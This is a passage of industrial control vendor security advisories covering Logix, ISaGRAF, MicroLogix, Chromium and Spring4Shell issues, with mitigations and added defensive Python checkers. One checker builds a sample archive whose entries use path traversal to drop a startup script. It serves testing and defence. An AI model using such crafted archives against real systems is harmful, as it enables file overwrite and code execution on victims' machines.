If a customer is unable to update to the mitigated version, it is suggested that Security Best Practices are followed as outlined in our Knowledgebase article, QA43240 - Security Best Practices.

References

CVE-2022-2848
CVE-2022-2825
ICSA-22-242-10 Advisory

Medium
PN1598 | CVE-2022-1096 Chromium Type Confusion Vulnerability Impacts Multiple Products
Published Date: August 26, 2022
Last Updated: August 26, 2022
CVE IDs: CVE-2022-1096
Products: Using CCW with PanelView Component Terminals, FactoryTalk Linx Gateway, FactoryTalk View SE, Installing CCW, FactoryTalk Linx / RSLinx Enterprise, PowerFlex 6000, Using CCW with Micro800 Controllers, Using CCW with Component Class Drives
CVSS Scores: 4.0
Known Exploited Vulnerability (KEV): No
Corrected: No
Workaround: No

Reference
CVE-2022-1096

Revision History (Revision Number 1.1)
Version 1.0 – July 12, 2022
Version 1.1 – August 26, 2022 – Updated FT View Site Edition Mitigation Instructions

Executive Summary

Rockwell Automation is aware of multiple products that embed the Chromium web browser and are affected by CVE-2022-1096, a type confusion vulnerability in the V8 JavaScript engine that was disclosed as a zero-day. In Rockwell Automation products, exploitation of this vulnerability could potentially lead to a low impact to the availability of the targeted device. We have not received any notice of this vulnerability being exploited in Rockwell Automation products.

Customers using the products in scope are encouraged to evaluate the following mitigations and apply them appropriately to their deployed products. Additional details relating to the discovered vulnerabilities including recommended countermeasures, are provided.

Affected Products

Product in Scope / Vulnerable Component

FactoryTalk® Linx Enterprise software v6.20, 6.21, and 6.30
  v6.21: CefSharp v73.1.130 (EIPCACT feature)
  v6.30: CefSharp v91.1.230 (EIPCACT feature)
  v6.20: CefSharp v73.1.130 (Device Config feature)
  v6.21: CefSharp v73.1.130 (Device Config feature)
  v6.30: CefSharp v73.1.130 (Device Config feature)

Enhanced HIM (eHIM) for PowerFlex® 6000T drives v1.001
  Electron v4.2.12

Connected Components Workbench™ software v11, 12, 13 & 20
  Note: Drives Trending 1.00.00 and 2.00.00 use Connected Components Workbench CefSharp v81.3.100

FactoryTalk Linx Gateway software v6.21 and v6.30
  v6.21: CefSharp v73.1.130
  v6.30: CefSharp v91.1.230

FactoryTalk View Site Edition software v13.0
  WebView2 v96.0.1054.43

Vulnerability Details

Rockwell Automation has been made aware of a third-party vulnerability that is present in multiple vendor components, which our products use. Due to the way Rockwell Automation uses the Chromium web browser, exploitation of this vulnerability may cause the vulnerable products to become unavailable temporarily. As a result, we adjusted the CVSS Score to reflect how this vulnerability affects our products.

CVE-2022-1096 Chromium Web Browser Type Confusion Vulnerability
CVSS Base Score: 4.0 /10 (Medium)
CVSS 3.1 Vector String:  CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

Risk Mitigation & User Action

Rockwell Automation is in the process of testing and validating the patch and will update this advisory for each product as updated software becomes available.

For customers using FactoryTalk View Site Edition, follow the recommended actions to address the vulnerability:
  • Do not use the FactoryTalk View SE web browser control if it is not required for the intended use of the product.
  • Customers utilizing the SE Web Browser can manually download and apply the newer version of WebView2 by using the following directions:
    • Replace the Microsoft® msedgewebview2.exe file saved in C:\Program Files (x86)\Rockwell Software\RSView Enterprise\Microsoft.WebView2.FixedVersionRuntime by copying and pasting the new version of the file into that folder.
    • DO NOT remove the contents of the folder before pasting the new file.

For customers using the Enhanced HIM (eHIM) for PowerFlex 6000T drives, follow the recommended actions to address the vulnerability:
  • Update the Microsoft Edge browser to Version 99.0.1150 or later. Additionally, apply the update for eHIM when it becomes available to mitigate the vulnerability.
If applying the mitigations, noted above, is not possible please see our Knowledgebase article, QA43240 - Security Best Practices, for additional recommendations to maintain the security posture of your environment.

References

  • CVE-2022-1096 - Security Update Guide - Microsoft - Chromium: CVE-2022-1096 Type Confusion in V8
  • ICSA-22-209-01 Advisory

Critical
PN1550 | CVE-2021-22681: Authentication Bypass Vulnerability Found in Logix Controllers
Published Date: July 20, 2022
Last Updated: July 20, 2022
CVE IDs: CVE-2021-22681
Products: SoftLogix5800, 1794 FlexLogix, 1756 ControlLogix, 1769 CompactLogix Controllers, 1769 Compact GuardLogix 5370, 1768 CompactLogix Controllers, 5069 Compact GuardLogix 5380, RSLogix 5000 / Studio 5000 Logix Designer
CVSS Scores: 10.0
Known Exploited Vulnerability (KEV): No
Corrected: No
Workaround: No

Revision History (Revision Number 1.4)
Version 1.0 - February 25, 2021. Initial Release.
Version 1.2 - March 5, 2021. Updated for clarity.
Version 1.3 - May 5, 2021. Mitigations updated – 1783-CSP CIP Security Proxy.
Version 1.4 - July 20, 2022. Rearranged placement of general mitigations.

Executive Summary

Researchers found that our Studio 5000 Logix Designer® software may allow a key to be discovered. This key is used to verify Logix controllers are communicating with Rockwell Automation design software. If successfully exploited, this vulnerability could allow an unauthorized application to connect with Logix controllers. To leverage this vulnerability, an unauthorized user would require network access to the controller.

FactoryTalk® Security provides user authentication and authorization for a particular set of actions within RSLogix® 5000 and Studio 5000®. Once the application is authorized to open and connect to the controller within RSLogix 5000 or Studio 5000 this verification mechanism, referenced above, is leveraged to establish the connection to the controller. For customers concerned with user access control and who have deployed FactoryTalk Security, this vulnerability may allow an attacker to bypass the protections provided by FactoryTalk Security.

This vulnerability was independently co-discovered by Lab of Information Systems Security Assurance (Eunseon Jeong, Youngho An, Junyoung Park, Insu Oh, Kangbin Yim) of Soonchunhyang University, Kaspersky, and by Claroty, a cybersecurity technology vendor and partner of Rockwell Automation.

Affected Products

Software:
RSLogix 5000 software v16-20, Studio 5000 Logix Designer v21 and later, and corresponding Logix controllers running these versions.
FactoryTalk Security, part of the FactoryTalk Services Platform, if configured and deployed v2.10 and later.

Controllers:
1768 CompactLogix™
1769 CompactLogix
CompactLogix 5370
CompactLogix 5380
CompactLogix 5480
ControlLogix 5550
ControlLogix® 5560
ControlLogix 5570
ControlLogix 5580
DriveLogix™ 5730
FlexLogix™ 1794-L34
Compact GuardLogix® 5370
Compact GuardLogix 5380
GuardLogix 5560
GuardLogix 5570
GuardLogix 5580
SoftLogix™ 5800

Vulnerability Details

CVE-2021-22681: Private Key Extraction
Studio 5000 Logix Designer uses a key to verify Logix controllers are communicating with Rockwell Automation products. If successfully exploited, this vulnerability could allow a remote, unauthenticated attacker to bypass a verification mechanism and authenticate with Logix controllers. If exploited, this vulnerability could enable an unauthorized third-party tool to make changes to the controller configuration and/or application code.

CVSS v3.1 Base Score: 10.0/CRITICAL
CVSS Vector: AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Risk Mitigation & User Action

For details and further mitigation options, please see the table below.

Product Family and Version / Risk Mitigation and Recommended User Actions

ControlLogix 5580 v32 or later
  • Put the controller mode switch to “Run” mode.
  If the above cannot be deployed, the following mitigations are recommended:
  • Deploy CIP Security for Logix Designer application connections through the front port. CIP Security prevents unauthorized connections when deployed properly.
  • If not using the front port, use a 1756-EN4TR ControlLogix EtherNet/IP™ module and deploy CIP Security. The 1756-EN4TR supports CIP Security, which prevents unauthorized connections when properly deployed.

ControlLogix 5580 v31
  • Put the controller mode switch to “Run” mode.
  If the above cannot be deployed, the following mitigations are recommended:
  • Apply v32 or later and follow the mitigation actions outlined above.
  • If unable to apply a newer version, use a 1756-EN4TR ControlLogix EtherNet/IP module and deploy CIP Security. The 1756-EN4TR supports CIP Security, which helps prevent unauthorized connections when properly deployed.

ControlLogix 5570 v31 or later
  • Put the controller mode switch to “Run” mode.
  If the above cannot be deployed, the following mitigation is recommended:
  • Use a 1756-EN4TR ControlLogix EtherNet/IP module and deploy CIP Security. The 1756-EN4TR supports CIP Security, which helps prevent unauthorized connections when properly deployed.

CompactLogix 5380 v28 or later
  • Put the controller mode switch to “Run” mode.
  If the above cannot be deployed, the following mitigation is recommended:
  • Install the 1783-CSP CIP Security Proxy to provide a secure connection between the engineering workstation and the controller. For more information, please see the 1783-CSP CIP Proxy User Manual.

CompactLogix 5370 v20 or later
  • Put the controller mode switch to “Run” mode.
  If the above cannot be deployed, the following mitigation is recommended:
  • Install the 1783-CSP CIP Security Proxy to provide a secure connection between the engineering workstation and the controller. For more information, please see the 1783-CSP CIP Proxy User Manual.

ControlLogix 5580 v28-v30
ControlLogix 5570 v18 or later
ControlLogix 5560 v16 or later
ControlLogix 5550 v16
GuardLogix 5580 v31 or later
GuardLogix 5570 v20 or later
GuardLogix 5560 v16 or later
1768 CompactLogix v16 or later
1769 CompactLogix v16 or later
CompactLogix 5480 v32 or later
Compact GuardLogix 5370 v28 or later
Compact GuardLogix 5380 v31 or later
FlexLogix 1794-L34 v16
DriveLogix 5730 v16 or later
  • Put the controller mode switch to “Run” mode.

SoftLogix 5800
  • No additional mitigation available. Follow the Converged Plantwide Ethernet (CPwE) Design and Implementation Guide.

Detection Strategies:
In addition, customers can continue to use the methods below to detect changes to configuration or application files:
  • Monitor controller change log for any unexpected modifications or anomalous activity.
  • If using v17 or later, utilize the Controller Log feature.
  • If using v20 or later, utilize Change Detection in the Logix Designer Application.
  • If available, use the functionality in FactoryTalk® AssetCentre software to detect changes.

General Security Guidelines

Network-based Vulnerability Mitigations for Embedded Products
  • Consult the product documentation for specific features, such as a hardware Mode Switch setting, which may be used to block unauthorized changes, etc.
Social Engineering Mitigation Strategies
  • Do not click on or open URL links from untrusted sources.
  • Employ training and awareness programs to educate users on the warning signs of a phishing or social engineering attack.
General Mitigations

Customers using the affected products are directed towards risk mitigation and are encouraged, when possible, to combine this guidance with the general security guidelines for a comprehensive defense-in-depth strategy.

Rockwell Automation has determined that this vulnerability cannot be mitigated with a patch. Rockwell Automation encourages customers to implement the mitigation strategies outlined in this disclosure.

A comprehensive defense-in-depth strategy can reduce the risk of this vulnerability. To leverage this vulnerability, an unauthorized user requires network access to the controller. Customers should confirm that they are employing proper network segmentation and security controls, including, but not limited to:
  • Use trusted software, software patches, antivirus/antimalware programs and interact only with trusted websites and attachments.
  • Minimize network exposure for all control system devices and/or systems and confirm that they are not accessible from the Internet.
  • Locate control system networks and devices behind firewalls and isolate them from the enterprise/business network.
  • Restrict or block traffic on TCP 44818 from outside of the industrial control system network zone. For more information on the TCP/UDP ports used by Rockwell Automation products, see BF7490 - TCP/UDP Ports Used by Rockwell Automation Products.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. A VPN is only as secure as the connected devices.
Customers can refer to the Converged Plantwide Ethernet (CPwE) Design and Implementation Guide (Publication ENET-TD001E) for best practices for deploying network segmentation and broader defense in depth strategies. Customers can also refer to the Rockwell Automation System Security Design Guidelines (Publication secure-rm001) on how to use Rockwell Automation products to improve the security of their industrial automation systems.
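The two network rules on this page (block TCP 44818 from outside the control system zone for this advisory, and in PN1604 allow ThinServer TFTP and HTTPS only from ThinManager-managed thin clients) are easy to state and easy to get wrong in a firewall policy, so it is worth checking them against actual flow records. The following Python script is an added example, not Rockwell Automation code: it encodes both rules as an allowlist and runs them over constructed flow lines. The zone, thin-client subnet and ThinServer address are placeholders, TFTP on UDP 69 and HTTPS on TCP 443 are assumed standard ports (confirm the ThinManager assignments against BF7490), and the "src dst proto dport" line format is invented for the sample, so adapt parse_flow() to your collector.

```python
"""Zone allowlist check over flow records (added illustration, not Rockwell code).

Rules encoded from the advisories on this page:
  * PN1550: TCP 44818 (EtherNet/IP explicit messaging) must not arrive from
    outside the industrial control system zone.
  * PN1604: ThinServer TFTP and HTTPS must be reachable only from the
    ThinManager-managed thin clients.
Assumptions: TFTP is UDP 69 and HTTPS is TCP 443 (standard ports); the zone,
thin-client subnet and ThinServer address are placeholders; flow lines use a
constructed "src dst proto dport" layout.
"""
import ipaddress

ICS_ZONE = [ipaddress.ip_network("10.20.0.0/16")]        # placeholder ICS zone
THIN_CLIENTS = [ipaddress.ip_network("10.20.50.0/24")]   # placeholder thin-client subnet
THINSERVER = ipaddress.ip_address("10.20.1.10")          # placeholder ThinServer address

# (name, proto, dport, required dst or None for any destination, allowed source networks)
RULES = [
    ("enip-explicit-44818", "tcp", 44818, None, ICS_ZONE),
    ("thinserver-tftp", "udp", 69, THINSERVER, THIN_CLIENTS),
    ("thinserver-https", "tcp", 443, THINSERVER, THIN_CLIENTS),
]


def parse_flow(line):
    """'src dst proto dport' -> (src_ip, dst_ip, proto, dport)."""
    src, dst, proto, dport = line.split()
    return ipaddress.ip_address(src), ipaddress.ip_address(dst), proto.lower(), int(dport)


def evaluate(line):
    """Return (rule_name, verdict); verdict is 'allow', 'deny' or 'unmatched'.

    The first matching rule wins, mirroring how a firewall policy is read.
    """
    src, dst, proto, dport = parse_flow(line)
    for name, r_proto, r_port, r_dst, allowed in RULES:
        if r_proto == proto and r_port == dport and (r_dst is None or r_dst == dst):
            verdict = "allow" if any(src in net for net in allowed) else "deny"
            return name, verdict
    return None, "unmatched"


def find_violations(lines):
    """Flows that matched a rule but came from a source outside its allowlist."""
    hits = []
    for line in lines:
        name, verdict = evaluate(line)
        if verdict == "deny":
            hits.append((line, name))
    return hits


# Constructed sample flows, not captured traffic.
SAMPLE_FLOWS = [
    "10.20.3.7 10.20.1.20 tcp 44818",        # workstation in zone -> controller: allowed
    "192.168.100.5 10.20.1.20 tcp 44818",    # enterprise host -> controller: violation
    "10.20.50.12 10.20.1.10 udp 69",         # thin client -> ThinServer TFTP: allowed
    "10.20.3.7 10.20.1.10 udp 69",           # in zone but not a thin client: violation
    "10.20.3.7 10.20.1.10 tcp 443",          # same host -> ThinServer HTTPS: violation
    "10.20.50.12 10.20.1.10 tcp 443",        # thin client -> ThinServer HTTPS: allowed
    "10.20.3.7 10.20.1.20 tcp 80",           # no rule for this port: unmatched
]

if __name__ == "__main__":
    for line, rule in find_violations(SAMPLE_FLOWS):
        print(f"VIOLATION [{rule}] {line}")
```

Note that the fourth sample is inside the control system zone and would pass a zone-only rule; it is still a violation of the ThinServer rule, which is why the thin-client allowlist has to be separate from the zone allowlist rather than folded into it.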

CIP Security mitigates this vulnerability as it provides the ability to deploy TLS and DTLS based secure communications to supported products.  CIP Security is an enhancement to the ODVA EtherNet/IP industrial communication standard and directly addresses the vulnerability noted in this disclosure. CIP Security allows for users to leverage and manage certificates and/or pre-shared keys and does not make use of any hardcoded keys.

As of May 5, 2021, a new mitigation option is now available.  The 1783-CSP CIP Security Proxy is a standalone hardware solution that provides CIP Security for devices that do not natively support CIP Security.  See below for how this product can be deployed to address CompactLogix based applications.

Customers requiring setup or deployment guidance for the CIP Security protocol should refer to the CIP Security deployment reference guide (Publication secure-at001) for more information.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

See the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to PSA/PN/Security Notifications. This can be done by updating settings in Account Overview within the Knowledgebase.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions website.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).

Additional Links
  • PN1354 - Industrial Security Advisory Index
  • Industrial Firewalls within a CPwE Architecture
  • Deploying Industrial Firewalls within a CPwE Architecture Design and Implementation Guide
  • ICSA-21-056-03

High
PN1600 | ISaGRAF Workbench Vulnerable to Multiple Phishing-Style Attacks
Published Date: July 20, 2022
Last Updated: July 20, 2022
CVE IDs: CVE-2022-2463, CVE-2022-2465, CVE-2022-2464
Products: AADvance, ISaGRAF, Trusted
CVSS Scores: 6.1, 7.7, 8.6
Known Exploited Vulnerability (KEV): No
Corrected: No
Workaround: No

Revision History
Version 1.0 – July 19, 2022
Version 1.1 – July 20, 2022 – Added AADvance-Trusted SIS Workstation to products affected

Executive Summary

Rockwell Automation received a report from Claroty regarding three vulnerabilities in ISaGRAF® Workbench. If successfully exploited, these vulnerabilities may result in directory traversal, privilege escalation, and arbitrary code execution. These vulnerabilities all require user interaction such as a phishing attack for successful exploitation.

Customers using affected versions of this software are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided herein.

Affected Products

  • ISaGRAF Workbench v6.0 through v6.6.9
  • AADvance-Trusted Safety Instrumented System Workstation v1.1 and below

Vulnerability Details

CVE-2022-2465: Deserialization of untrusted data may result in arbitrary code execution

ISaGRAF Workbench does not limit the objects that can be deserialized. This vulnerability allows attackers to craft a malicious serialized object that, if opened by a local user in ISaGRAF Workbench, may result in arbitrary code execution. This vulnerability requires user interaction to be successfully exploited.

CVSS v3.1 Base Score: 8.6/10 (High)
CVSS v3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

CVE-2022-2464: Directory traversal vulnerability may lead to privilege escalation

The parsing mechanism that processes certain file types does not provide input sanitization for file paths. This may allow an attacker to craft malicious files that, when opened by ISaGRAF Workbench, can traverse the file system. If successfully exploited, an attacker would be able to overwrite existing files and create additional files with the same permissions of the ISaGRAF Workbench software. User interaction is required for this exploit to be successful.

CVSS v3.1 Base Score: 7.7/10 (High)
CVSS v3.1 Vector: CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H

CVE-2022-2463: Improper input sanitization may lead to privilege escalation

ISaGRAF does not sanitize paths specified within the .7z exchange file during extraction. This type of vulnerability is also commonly referred to as a Zip Slip. A local, authenticated attacker can create a malicious .7z exchange file that when opened by ISaGRAF Workbench will allow the attacker to gain the privileges of the software. If the software is running at SYSTEM level, the attacker will gain admin level privileges. User interaction is required for this exploit to be successful.

CVSS v3.1 Base Score: 6.1/10 (Medium)
CVSS v3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L
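The Zip Slip class described for CVE-2022-2463 comes down to one missing check: does the path stored in an archive entry, once joined to the import directory and resolved, still sit inside that directory? The Python below is an added example, not ISaGRAF or Rockwell Automation code. Reading a .7z file needs a third-party library, so it builds a ZIP archive in memory with the standard library instead; the member-name check is the same for any archive format. The archive contents and the import directory are constructed for the example.

```python
"""Zip Slip check for an exchange-file import (added illustration, not ISaGRAF code).

ISaGRAF Workbench did not sanitise member paths in .7z exchange files before
extraction. Reading .7z needs a third-party library, so this example uses a ZIP
archive built in memory with the standard library; the vulnerable pattern and
its fix live entirely in the member-name check, which is format-independent.
The archive contents and the import directory are constructed.
"""
import io
import os
import zipfile


def member_escapes(dest_dir, member_name):
    """True if extracting `member_name` under `dest_dir` would land outside it."""
    name = member_name.replace("\\", "/")      # archives may carry either separator
    if not name or name.startswith("/"):       # absolute POSIX path
        return True
    head = name.split("/", 1)[0]
    if len(head) >= 2 and head[1] == ":":      # Windows drive letter such as C:
        return True
    dest = os.path.realpath(dest_dir)
    target = os.path.realpath(os.path.join(dest, *name.split("/")))
    # realpath collapses '..'; an escaped target no longer has dest as its prefix
    return os.path.commonpath([dest, target]) != dest


def audit_archive(zip_bytes, dest_dir):
    """Classify every entry as 'safe' or 'traversal' without writing anything."""
    report = {"safe": [], "traversal": []}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            bucket = "traversal" if member_escapes(dest_dir, info.filename) else "safe"
            report[bucket].append(info.filename)
    return report


def safe_extract(zip_bytes, dest_dir):
    """Hardened import: validate every name first, refuse the whole archive on any escape."""
    report = audit_archive(zip_bytes, dest_dir)
    if report["traversal"]:
        raise ValueError(f"refusing archive with traversal entries: {report['traversal']}")
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        zf.extractall(dest_dir)    # every name already validated above
    return report["safe"]


def build_malicious_exchange_archive():
    """Constructed sample: one benign project file plus two entries that try to escape."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("project/main.st", "PROGRAM main\nEND_PROGRAM\n")
        zf.writestr("../../Startup/payload.cmd", "echo owned\n")     # classic Zip Slip
        zf.writestr("C:/Windows/Temp/abs.txt", "absolute path\n")   # drive-absolute path
    return buf.getvalue()


if __name__ == "__main__":
    import tempfile
    with tempfile.TemporaryDirectory() as import_dir:
        print(audit_archive(build_malicious_exchange_archive(), import_dir))
```

The check is deliberately done on the resolved path rather than by string-matching "..": a name such as sub/../ok.txt is harmless and should pass, while sub/../../no.txt must fail, and both are handled correctly by comparing the resolved target against the resolved import directory. CPython's own zipfile.extractall strips traversal components at extraction time, which is why the example validates names itself rather than relying on library behaviour; a custom extractor or a 7z library has to perform this check explicitly. Refusing the whole archive, instead of silently skipping bad entries, matches the advisory's advice not to open untrusted exchange files at all.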

Risk Mitigation & User Action

Customers using the affected software are encouraged to update to an available software revision that addresses the associated risk. Customers who are unable to update are directed towards the risk mitigation strategies provided below, and are encouraged, when possible, to combine these with the general security guidelines to employ multiple strategies simultaneously.

Vulnerability                                   Product                             Suggested Actions
CVE-2022-2463, CVE-2022-2464, CVE-2022-2465     ISaGRAF Workbench                   Upgrade to ISaGRAF Workbench v6.6.10 or later.
CVE-2022-2463, CVE-2022-2464                    AADvance-Trusted SIS Workstation    Upgrade to AADvance-Trusted SIS Workstation 1.2 or later.
CVE-2022-2465                                   AADvance-Trusted SIS Workstation    Follow the security guidelines below until an updated release is available to mitigate this issue.
If immediate upgrade is not possible, customers should consider implementing the following mitigations:
  • Run ISaGRAF Workbench as a User, not as an Administrator, to minimize the impact of malicious code on the infected system.
  • Do not open untrusted .7z exchange files with ISaGRAF Workbench. Employ training and awareness programs to educate users on the warning signs of a phishing or social engineering attack.
  • Use of Microsoft® AppLocker or other similar allow list application can help mitigate risk. Information on using AppLocker with Rockwell Automation products is available at Knowledgebase Article QA17329 - Using Rockwell Automation Software Products with AppLocker.
  • Ensure that the least-privilege user principle is followed, and user/service account access to shared resources (such as a database) is only granted with a minimum number of rights as needed.

General Security Guidelines

If applying the mitigations noted above is not possible, please see our Knowledgebase article, QA43240 – Security Best Practices, for additional recommendations to maintain the security posture of your environment.

We also recommend that concerned customers continue to monitor this advisory by subscribing to PSA/PN/Security Notifications. This can be done by updating settings in Account Overview within the Knowledgebase.

Requests for additional information can be sent to the PSIRT Inbox (PSIRT@rockwellautomation.com).

Additional Links

  • PN1354 – Industrial Security Advisory Index
  • https://nvd.nist.gov/vuln/detail/CVE-2022-2463
  • https://nvd.nist.gov/vuln/detail/CVE-2022-2464
  • https://nvd.nist.gov/vuln/detail/CVE-2022-2465

Critical
PN1599 | FactoryTalk Analytics DataView Vulnerable to Spring4Shell Vulnerability (CVE-2022-22965)
Published Date: July 14, 2022
Last Updated: July 14, 2022
Products: FactoryTalk Analytics DataView
CVSS Scores: 9.8
Known Exploited Vulnerability (KEV): No
Corrected: No
Workaround: No

Revision History
Version 1.0 – July 14, 2022

Executive Summary

Rockwell Automation was made aware of a zero-day vulnerability that impacts the Spring Core Framework. If exploited, this vulnerability could potentially have a high impact on the confidentiality, integrity, and availability of the targeted device.

Customers using affected versions of this software are encouraged to evaluate the following mitigations and apply them where appropriate. Additional details relating to the discovered vulnerability, including products in scope, impact, and recommended countermeasures are provided. We have not received any notice of this vulnerability being exploited in Rockwell Automation products.

Affected Products

  • FactoryTalk® Analytics™ DataView v.3.03.01 and below

Vulnerability Details

Rockwell Automation was made aware of a third-party remote code execution vulnerability in the Spring Core Framework. An attacker could exploit it by sending a specially crafted request to a vulnerable server. In the known exploitation scenario, the target application runs on JDK 9 or later and is deployed to Apache Tomcat as a WAR file. However, due to the nature of the vulnerability, other ways to exploit it may exist.

CVSS Base Score: 9.8 /10 (Critical)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Risk Mitigation & User Action

Rockwell Automation is in the process of testing and validating the patch and will update this advisory for each product as updated software becomes available. Please see our Knowledgebase article, QA43240 - Security Best Practices, for additional recommendations to maintain the security posture of your environment.

References

  • NVD - CVE-2022-22965

Medium
PN1597 | MicroLogix 1400/1100 Vulnerable to Clickjacking Vulnerability
Published Date: July 07, 2022
Last Updated: July 07, 2022
CVE IDs: CVE-2022-2179
Products: 1763 MicroLogix 1100, 1766 MicroLogix 1400
CVSS Scores: 6.5
Known Exploited Vulnerability (KEV): No
Corrected: No
Workaround: No

Revision History
Version 1.0 – July 7, 2022

Executive Summary

Rockwell Automation received a vulnerability report from Pawan V. Sable and Pranita Sadgir, and Dr. Faruk Kazi of COE-CNDS from Veermata Jijabai Technological Institute (VJTI) India. If exploited, this vulnerability could potentially have a high impact on the confidentiality of the targeted device.

Customers using affected versions of this software are encouraged to evaluate the mitigations provided below and apply them where appropriate. Additional details relating to the discovered vulnerability, including the products in scope, impact, and recommended countermeasures, are provided herein. We have not received any notice of this vulnerability being exploited in Rockwell Automation products.

Affected Products

  • MicroLogix™ 1400 v. 21.007 and below
  • MicroLogix™ 1100 all versions

Vulnerability Details

Rockwell Automation was made aware that the X-Frame-Options header is not configured in the HTTP response, which allows potential clickjacking attacks: an attacker-controlled website can embed the controller's web pages in a hidden frame and trick a legitimate user into interacting with them. If exploited, this vulnerability could lead to a loss of sensitive information, such as authentication credentials.

CVE-2022-2179 MicroLogix Controllers Vulnerable to Clickjacking Attack
CVSS Base Score: 6.5 /10 (Medium)
CVSS 3.1 Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
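Because the MicroLogix 1100 has no fixed version, the practical question for this advisory is whether a given device's pages can still be framed, which is answered by looking at its response headers. The Python below is an added example, not Rockwell Automation code: it parses a raw HTTP response and reports whether the page is protected by an X-Frame-Options value of DENY or SAMEORIGIN, or by a Content-Security-Policy frame-ancestors directive that does not permit arbitrary origins. The sample responses are constructed; the first one only reflects the advisory's statement that the header is absent and is not a captured MicroLogix response. fetch_raw_headers() is a convenience for pointing the check at a live device and is not used by the samples.

```python
"""Clickjacking exposure check for an embedded web server (added illustration).

A page is considered protected when either X-Frame-Options is DENY or
SAMEORIGIN (ALLOW-FROM is obsolete and ignored by current browsers), or a
Content-Security-Policy carries a frame-ancestors directive that does not
permit arbitrary origins. All sample responses below are constructed.
"""
import http.client


def parse_headers(raw):
    """Raw response text -> {lower-case name: [values]}; stops at the blank line."""
    headers = {}
    lines = raw.replace("\r\n", "\n").split("\n")
    for line in lines[1:]:                 # lines[0] is the status line
        if not line.strip():
            break
        name, _, value = line.partition(":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return headers


def frame_ancestors(csp_values):
    """Source list of the first frame-ancestors directive, or None if absent."""
    for policy in csp_values:
        for directive in policy.split(";"):
            tokens = directive.split()
            if tokens and tokens[0].lower() == "frame-ancestors":
                return [t.lower() for t in tokens[1:]]
    return None


def clickjacking_exposure(raw):
    """Return a dict with 'exposed' (bool) and the evidence behind the verdict."""
    h = parse_headers(raw)
    xfo = [v.upper() for v in h.get("x-frame-options", [])]
    ancestors = frame_ancestors(h.get("content-security-policy", []))
    protected_by = []
    if any(v in ("DENY", "SAMEORIGIN") for v in xfo):
        protected_by.append("x-frame-options")
    # '*' or a bare scheme such as 'https:' lets any site frame the page.
    if ancestors is not None and not any(t == "*" or t.endswith(":") for t in ancestors):
        protected_by.append("frame-ancestors")
    return {"exposed": not protected_by, "x_frame_options": xfo,
            "frame_ancestors": ancestors, "protected_by": protected_by}


def fetch_raw_headers(host, port=80, path="/", timeout=5):
    """Fetch a live response and rebuild the raw header block for clickjacking_exposure()."""
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    try:
        conn.request("GET", path)
        resp = conn.getresponse()
        status = f"HTTP/1.1 {resp.status} {resp.reason}"
        return status + "\r\n" + "".join(f"{k}: {v}\r\n" for k, v in resp.getheaders()) + "\r\n"
    finally:
        conn.close()


# Constructed samples, not captured device responses.
NO_PROTECTION = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
    "<html><body>Controller status page</body></html>"
)
XFO_ONLY = "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\nX-Frame-Options: SAMEORIGIN\r\n\r\n"
CSP_SELF = "HTTP/1.1 200 OK\r\nContent-Security-Policy: default-src 'self'; frame-ancestors 'self'\r\n\r\n"
CSP_WILDCARD = "HTTP/1.1 200 OK\r\nContent-Security-Policy: frame-ancestors *\r\n\r\n"
XFO_OBSOLETE = "HTTP/1.1 200 OK\r\nX-Frame-Options: ALLOW-FROM https://example.com\r\n\r\n"

if __name__ == "__main__":
    for label, raw in [("no-protection", NO_PROTECTION), ("xfo", XFO_ONLY),
                       ("csp-self", CSP_SELF), ("csp-wildcard", CSP_WILDCARD),
                       ("xfo-allow-from", XFO_OBSOLETE)]:
        print(label, clickjacking_exposure(raw))
```

If the advisory's mitigation has been applied and the web server is disabled, fetch_raw_headers() will fail to connect, which is the expected outcome; the header check is for devices where the web server must stay enabled and the exposure has to be verified rather than assumed.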

Risk Mitigation & User Action

Customers using the affected software are encouraged to implement the risk mitigations below to minimize the risk of vulnerability. Additionally, we encourage customers to combine the risk mitigations with security best practices, also provided below, to deploy a defense-in-depth strategy.
  • Disable the web server, if possible (This component is an optional feature and disabling it will not disrupt the intended use of the device)
  • Configure firewalls to disallow network communication through HTTP/Port 80
If applying the mitigations noted above is not possible, please see our Knowledgebase article QA43240 - Security Best Practices for additional recommendations to maintain the security posture of your environment.
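The following is an added example, not code from the advisory or from Rockwell Automation. It shows how a defender can confirm from a captured HTTP response whether the condition described for CVE-2022-2179 (no X-Frame-Options header) is present, and whether either of the two controls browsers honour against framing is in place: a valid X-Frame-Options value or a Content-Security-Policy frame-ancestors directive. The sample responses are constructed for the example and are not captures from a MicroLogix device.

```python
"""Check an HTTP response for anti-framing headers (added example)."""
from __future__ import annotations

# Browsers honour only these two values; ALLOW-FROM is obsolete and ignored,
# and a conflicting or unknown value causes the header to be ignored entirely.
VALID_XFO = {"DENY", "SAMEORIGIN"}


def parse_response_headers(raw: str) -> dict[str, list[str]]:
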